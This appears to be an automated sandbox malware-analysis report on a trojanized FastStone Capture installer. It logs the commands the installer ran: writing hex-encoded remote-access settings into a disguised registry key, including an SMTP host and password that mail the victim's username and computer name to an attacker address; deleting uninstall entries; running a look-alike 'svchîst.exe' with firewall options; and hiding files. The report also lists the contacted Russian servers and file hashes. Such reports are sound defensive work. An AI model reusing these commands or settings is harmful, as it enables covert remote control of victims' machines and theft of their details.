"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastStone Capture 9.4" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /silentinstall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /firewall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /start

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\SysWOW64\drivers\svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.cmd"

C:\Windows\SysWOW64\drivers\svchîst.exe

C:\Windows\SysWOW64\drivers\svchîst.exe -firewall

Network

Country Destination Domain Proto
US 20.42.72.131:443 tcp
NL 104.110.191.140:80 tcp
US 93.184.221.240:80 tcp
US 204.79.197.203:80 tcp
US 13.107.21.200:443 tcp
US 8.8.8.8:53 smtp.spaceweb.ru udp
RU 77.222.41.129:25 smtp.spaceweb.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
RU 109.234.156.179:5655 tcp

Files

memory/4120-130-0x0000000000000000-mapping.dmp

memory/4916-131-0x0000000000000000-mapping.dmp

memory/4220-133-0x0000000000000000-mapping.dmp

memory/3088-132-0x0000000000000000-mapping.dmp

memory/2588-134-0x0000000000000000-mapping.dmp

memory/2292-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

MD5 d11ab72ad73808bea3acf250e78c1d50
SHA1 b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7
SHA256 b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b
SHA512 fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31

C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

MD5 d11ab72ad73808bea3acf250e78c1d50
SHA1 b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7
SHA256 b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b
SHA512 fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31

memory/4672-138-0x0000000000000000-mapping.dmp

memory/5040-139-0x0000000000000000-mapping.dmp

memory/4344-140-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\nsExec.dll

MD5 f27689c513e7d12c7c974d5f8ef710d6
SHA1 e305f2a2898d765a64c82c449dfb528665b4a892
SHA256 1f18f4126124b0551f3dbcd0fec7f34026f930ca509f04435657cedc32ae8c47
SHA512 734e9f3989ee47a86bee16838df7a09353c7fe085a09d77e70d281b21c5477b0b061616e72e8ac8fcb3dda1df0d5152f54dcc4c5a77f90fbf0f857557bf02fbc

memory/5004-142-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\nsExec.dll

MD5 f27689c513e7d12c7c974d5f8ef710d6
SHA1 e305f2a2898d765a64c82c449dfb528665b4a892
SHA256 1f18f4126124b0551f3dbcd0fec7f34026f930ca509f04435657cedc32ae8c47
SHA512 734e9f3989ee47a86bee16838df7a09353c7fe085a09d77e70d281b21c5477b0b061616e72e8ac8fcb3dda1df0d5152f54dcc4c5a77f90fbf0f857557bf02fbc

memory/624-144-0x0000000000000000-mapping.dmp

memory/1304-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\nsProcess.dll

MD5 f0438a894f3a7e01a4aae8d1b5dd0289
SHA1 b058e3fcfb7b550041da16bf10d8837024c38bf6
SHA256 30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11
SHA512 f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7

memory/5092-158-0x0000000000000000-mapping.dmp

memory/4780-159-0x0000000000000000-mapping.dmp

memory/1240-160-0x0000000000000000-mapping.dmp

memory/832-161-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

memory/3588-164-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\FastStone Capture\FSCapture.exe

MD5 1eceb7f17d041444ea91fcb5a3272c3e
SHA1 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f
SHA256 d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929
SHA512 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d

C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

MD5 8708699d2c73bed30a0a08d80f96d6d7
SHA1 684cb9d317146553e8c5269c8afb1539565f4f78
SHA256 a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f
SHA512 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

C:\Program Files (x86)\FastStone Capture\FSCapture.exe

MD5 1eceb7f17d041444ea91fcb5a3272c3e
SHA1 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f
SHA256 d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929
SHA512 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d

C:\Program Files (x86)\FastStone Capture\FSCapture.ENU

MD5 a34680a3a79746aa2851f53ee970fed9
SHA1 88b31d3753012e3c8ed3806aa9fb45bb39091584
SHA256 9942d2e76602e3c3ffd2f2a6a124d2f768a361e46ba28f407604e77742ebc9dd
SHA512 cd0334613f0044aae24fb76812752e2e5c94a330d689230adedd2b625db4abedc57a8d216720b7c21784926df7e88cb891883671318f6001951946f418196ea7

memory/3924-169-0x0000000000000000-mapping.dmp

